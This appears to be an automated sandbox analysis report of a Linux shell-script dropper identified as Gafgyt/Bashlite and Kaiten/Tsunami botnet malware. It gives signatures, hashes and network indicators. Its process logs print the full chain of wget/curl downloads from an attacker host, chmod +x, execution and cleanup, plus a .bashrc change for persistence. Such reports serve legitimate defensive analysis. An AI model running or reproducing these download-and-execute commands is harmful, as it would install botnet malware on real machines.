Analysis Overview
SHA256
0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c
Threat Level: Known bad
The file 0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh was found to be: Known bad.
Malicious Activity Summary
Gafgyt/Bashlite
Detected Gafgyt variant
Detects Kaiten/Tsunami Payload
Detects Kaiten/Tsunami payload
Kaiten/Tsunami
File and Directory Permissions Modification
Executes dropped EXE
Creates/modifies environment variables
Modifies Bash startup script
Checks CPU configuration
Reads runtime system information
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-23 01:00
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-23 01:00
Reported
2024-10-23 01:02
Platform
debian9-armhf-20240729-en
Max time kernel
149s
Max time network
3s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/m3cr0 | /usr/bin/wget | N/A |
Processes
/tmp/0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh
[/tmp/0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh]
/usr/bin/wget
[wget http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0]
/usr/bin/curl
[curl http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | floodernetwork111.accesscam.org | udp |
| US | 1.1.1.1:53 | floodernetwork111.accesscam.org | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-23 01:00
Reported
2024-10-23 01:02
Platform
debian9-mipsbe-20240611-en
Max time kernel
33s
Max time network
35s
Command Line
Signatures
Detected Gafgyt variant
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Detects Kaiten/Tsunami Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Kaiten/Tsunami payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Gafgyt/Bashlite
Kaiten/Tsunami
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/m3cr0 | /tmp/m3cr0 | N/A |
| N/A | /tmp/zigaarch64 | /tmp/zigaarch64 | N/A |
| N/A | /tmp/x00x | /tmp/x00x | N/A |
| N/A | /tmp/m3cr0 | /tmp/m3cr0 | N/A |
Creates/modifies environment variables
| Description | Indicator | Process | Target |
| File opened for modification | /root/.bashrc | /tmp/0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh | N/A |
Modifies Bash startup script
| Description | Indicator | Process | Target |
| File opened for modification | /root/.bashrc | /tmp/0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/bash.sh | /usr/bin/wget | N/A |
| File opened for modification | /tmp/bash.sh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/m3cr0 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/x00x | /usr/bin/wget | N/A |
| File opened for modification | /tmp/x00x | /usr/bin/curl | N/A |
| File opened for modification | /tmp/m3cr0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/m3cr0 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/m3cr0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zigaarch64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/zigaarch64 | /usr/bin/curl | N/A |
Processes
/tmp/0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh
[/tmp/0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh]
/usr/bin/wget
[wget http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0]
/usr/bin/curl
[curl http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0]
/bin/chmod
[chmod +x m3cr0]
/tmp/m3cr0
[./m3cr0]
/bin/rm
[rm -rf m3cr0]
/bin/rm
[rm -rf m3cr0.1]
/usr/bin/wget
[wget http://floodernetwork111.accesscam.org:8089/b/zigaarch64 -O zigaarch64]
/usr/bin/curl
[curl http://floodernetwork111.accesscam.org:8089/b/zigaarch64 -o zigaarch64]
/bin/chmod
[chmod +x zigaarch64]
/tmp/zigaarch64
[./zigaarch64]
/bin/rm
[rm -rf zigaarch64]
/bin/rm
[rm -rf zigaarch64.1]
/usr/bin/wget
[wget -q http://floodernetwork111.accesscam.org:8089/b/x00x -O x00x]
/usr/bin/curl
[curl -s http://floodernetwork111.accesscam.org:8089/b/x00x -o x00x]
/bin/chmod
[chmod +x x00x]
/tmp/x00x
[./x00x]
/bin/rm
[rm -rf x00x]
/bin/rm
[rm -rf x00x.1]
/usr/bin/wget
[wget http://floodernetwork111.accesscam.org:8089/bash.sh]
/usr/bin/curl
[curl -O http://floodernetwork111.accesscam.org:8089/bash.sh]
/bin/rm
[rm -rf bash.sh.1]
/bin/bash
[bash bash.sh]
/usr/bin/wget
[wget -q http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0]
/usr/bin/curl
[curl -s http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0]
/bin/chmod
[chmod +x m3cr0]
/tmp/m3cr0
[./m3cr0]
/bin/rm
[rm -rf m3cr0]
/bin/rm
[rm -rf m3cr0.1]
/bin/sleep
[sleep 6000]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | floodernetwork111.accesscam.org | udp |
| BR | 191.19.234.178:8089 | floodernetwork111.accesscam.org | tcp |
| US | 1.1.1.1:53 | floodernetwork111.accesscam.org | udp |
| BR | 191.19.234.178:8089 | floodernetwork111.accesscam.org | tcp |
| US | 1.1.1.1:53 | floodernetwork111.accesscam.org | udp |
| BR | 191.19.234.178:8089 | floodernetwork111.accesscam.org | tcp |
| US | 1.1.1.1:53 | floodernetwork111.accesscam.org | udp |
| BR | 191.19.234.178:8089 | floodernetwork111.accesscam.org | tcp |
| US | 1.1.1.1:53 | floodernetwork111.accesscam.org | udp |
| BR | 191.19.234.178:8089 | floodernetwork111.accesscam.org | tcp |
| US | 1.1.1.1:53 | floodernetwork111.accesscam.org | udp |
| BR | 191.19.234.178:8089 | floodernetwork111.accesscam.org | tcp |
| US | 1.1.1.1:53 | floodernetwork111.accesscam.org | udp |
| BR | 191.19.234.178:8089 | floodernetwork111.accesscam.org | tcp |
| US | 1.1.1.1:53 | floodernetwork111.accesscam.org | udp |
| BR | 191.19.234.178:8089 | floodernetwork111.accesscam.org | tcp |
| US | 1.1.1.1:53 | floodernetwork111.accesscam.org | udp |
| BR | 191.19.234.178:8089 | floodernetwork111.accesscam.org | tcp |
| US | 1.1.1.1:53 | floodernetwork111.accesscam.org | udp |
| BR | 191.19.234.178:8089 | floodernetwork111.accesscam.org | tcp |
Files
/tmp/m3cr0
| MD5 | 75c00b238bd8105414cbb5d08601ca1a |
| SHA1 | 2a5e59555f348bfd9fa9fc4e3e04338ee4e74576 |
| SHA256 | edbe8e5b476327cac01434634849de230eaeae5943e3cc6680aa8c6ccc29d361 |
| SHA512 | a7198035e4dc090cc10d20c19d4f606d5e5d4bba4ea9ab54ed61dbdbe93da16c3a5a85eb4a0c9d39af8dbfc4c578f5a01c5aaa271b5c649e646341ad6ce300b5 |
/tmp/zigaarch64
| MD5 | 48ea3c3566c796e4f74e8e3d6df15cd3 |
| SHA1 | b1ef1574ced09471c26a4c749d5a4ab5ba7942cd |
| SHA256 | 79b552ce829cd07000f0ff57dcc7970c43a8a0e2b75c4b0158acd4e24cb1f47a |
| SHA512 | cb5d342e421089ccba5be87ba64833ee90b78c2954b27719033fa56afbd4aae232b153ba45a7b4664886be8a5961890e54e92349af7e6ef517e7f0a3933928cd |
/tmp/x00x
| MD5 | f042a9131a6d06671e98c1ed1f8d80a8 |
| SHA1 | dd97fac87e8d4a973dc4867524908f3384916f27 |
| SHA256 | a70fdd8fa252beeca41955bee2d4ce3e6e1f6aa60746ee96ec59b96106080a6c |
| SHA512 | 629282e501a77e08295260802427747288af6bca1c0695adb9325b9ce01b9e4b0f4a065c86829eeba5c91cfb66d2965d3de3968e87a3d277471a2216ea2eaafe |
/tmp/bash.sh
| MD5 | 8bbe815474c7d3ed318e958c05e1c95b |
| SHA1 | 36235a707a29d27b01570ef8c973c522f563c15c |
| SHA256 | 469640f9d4de9b71c4720298f7eb585c403f5a13e55e2bedc0da3937dd8b8f5b |
| SHA512 | 137a228141556d1fc6da421fd8bc45b81108908c39e734b235af6dca9b36dee059043f046dd2f670067a10db1e0280a0941f45c0b7ee1c774d1aa7f4cc2e756f |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-23 01:00
Reported
2024-10-23 01:02
Platform
debian9-mipsel-20240226-en
Max time kernel
54s
Max time network
68s
Command Line
Signatures
Detects Kaiten/Tsunami Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Detects Kaiten/Tsunami payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Kaiten/Tsunami
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/m3cr0 | /tmp/m3cr0 | N/A |
| N/A | /tmp/zigaarch64 | /tmp/zigaarch64 | N/A |
| N/A | /tmp/x00x | /tmp/x00x | N/A |
| N/A | /tmp/m3cr0 | /tmp/m3cr0 | N/A |
Creates/modifies environment variables
| Description | Indicator | Process | Target |
| File opened for modification | /root/.bashrc | /tmp/0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh | N/A |
Modifies Bash startup script
| Description | Indicator | Process | Target |
| File opened for modification | /root/.bashrc | /tmp/0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/x00x | /usr/bin/curl | N/A |
| File opened for modification | /tmp/bash.sh | /usr/bin/curl | N/A |
| File opened for modification | /tmp/m3cr0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zigaarch64 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/zigaarch64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/x00x | /usr/bin/wget | N/A |
| File opened for modification | /tmp/m3cr0 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/m3cr0 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/m3cr0 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/bash.sh | /usr/bin/wget | N/A |
Processes
/tmp/0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh
[/tmp/0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh]
/usr/bin/wget
[wget http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0]
/usr/bin/curl
[curl http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0]
/bin/chmod
[chmod +x m3cr0]
/tmp/m3cr0
[./m3cr0]
/bin/rm
[rm -rf m3cr0]
/bin/rm
[rm -rf m3cr0.1]
/usr/bin/wget
[wget http://floodernetwork111.accesscam.org:8089/b/zigaarch64 -O zigaarch64]
/usr/bin/curl
[curl http://floodernetwork111.accesscam.org:8089/b/zigaarch64 -o zigaarch64]
/bin/chmod
[chmod +x zigaarch64]
/tmp/zigaarch64
[./zigaarch64]
/bin/rm
[rm -rf zigaarch64]
/bin/rm
[rm -rf zigaarch64.1]
/usr/bin/wget
[wget -q http://floodernetwork111.accesscam.org:8089/b/x00x -O x00x]
/usr/bin/curl
[curl -s http://floodernetwork111.accesscam.org:8089/b/x00x -o x00x]
/bin/chmod
[chmod +x x00x]
/tmp/x00x
[./x00x]
/bin/rm
[rm -rf x00x]
/bin/rm
[rm -rf x00x.1]
/usr/bin/wget
[wget http://floodernetwork111.accesscam.org:8089/bash.sh]
/usr/bin/curl
[curl -O http://floodernetwork111.accesscam.org:8089/bash.sh]
/bin/rm
[rm -rf bash.sh.1]
/bin/bash
[bash bash.sh]
/usr/bin/wget
[wget -q http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0]
/usr/bin/curl
[curl -s http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0]
/bin/chmod
[chmod +x m3cr0]
/tmp/m3cr0
[./m3cr0]
/bin/rm
[rm -rf m3cr0]
/bin/rm
[rm -rf m3cr0.1]
/bin/sleep
[sleep 6000]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | floodernetwork111.accesscam.org | udp |
| BR | 191.19.234.178:8089 | floodernetwork111.accesscam.org | tcp |
| US | 1.1.1.1:53 | floodernetwork111.accesscam.org | udp |
| BR | 191.19.234.178:8089 | floodernetwork111.accesscam.org | tcp |
| BR | 191.19.234.178:8089 | floodernetwork111.accesscam.org | tcp |
| BR | 191.19.234.178:8089 | floodernetwork111.accesscam.org | tcp |
| US | 1.1.1.1:53 | floodernetwork111.accesscam.org | udp |
| BR | 191.19.234.178:8089 | floodernetwork111.accesscam.org | tcp |
| US | 1.1.1.1:53 | floodernetwork111.accesscam.org | udp |
| BR | 191.19.234.178:8089 | floodernetwork111.accesscam.org | tcp |
Files
/tmp/m3cr0
| MD5 | 75c00b238bd8105414cbb5d08601ca1a |
| SHA1 | 2a5e59555f348bfd9fa9fc4e3e04338ee4e74576 |
| SHA256 | edbe8e5b476327cac01434634849de230eaeae5943e3cc6680aa8c6ccc29d361 |
| SHA512 | a7198035e4dc090cc10d20c19d4f606d5e5d4bba4ea9ab54ed61dbdbe93da16c3a5a85eb4a0c9d39af8dbfc4c578f5a01c5aaa271b5c649e646341ad6ce300b5 |
/tmp/zigaarch64
| MD5 | 48ea3c3566c796e4f74e8e3d6df15cd3 |
| SHA1 | b1ef1574ced09471c26a4c749d5a4ab5ba7942cd |
| SHA256 | 79b552ce829cd07000f0ff57dcc7970c43a8a0e2b75c4b0158acd4e24cb1f47a |
| SHA512 | cb5d342e421089ccba5be87ba64833ee90b78c2954b27719033fa56afbd4aae232b153ba45a7b4664886be8a5961890e54e92349af7e6ef517e7f0a3933928cd |
/tmp/x00x
| MD5 | 329c40f5253efe5909214b73f9ee0085 |
| SHA1 | 85c0fd22c8a1f860fe047980dc4f94a5ec48278d |
| SHA256 | a166155f1f60f411e71db6a34a38de4e5141e1efcb3a7180d215cf4789fe3106 |
| SHA512 | 9bc97d97b3f708799045811f09f6f159de8ef4a792801528b88e977a67546be0ee52726c71272e07fa510638adc7365a5d174e3ef9f3da54b13868363c0ed873 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-10-23 01:00
Reported
2024-10-23 01:02
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
148s
Max time network
131s
Command Line
Signatures
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/m3cr0 | /usr/bin/wget | N/A |
Processes
/tmp/0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh
[/tmp/0076fe37f41ee52f12cf76c5bbbc5eb726ce534ec6da22c358499bb948d17b6c.sh]
/usr/bin/wget
[wget http://floodernetwork111.accesscam.org:8089/b/m3cr0 -O m3cr0]
/usr/bin/curl
[curl http://floodernetwork111.accesscam.org:8089/b/m3cr0 -o m3cr0]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 1.1.1.1:53 | floodernetwork111.accesscam.org | udp |
| US | 1.1.1.1:53 | floodernetwork111.accesscam.org | udp |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.62:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| US | 151.101.1.91:443 | tcp | |
| GB | 195.181.164.14:443 | tcp |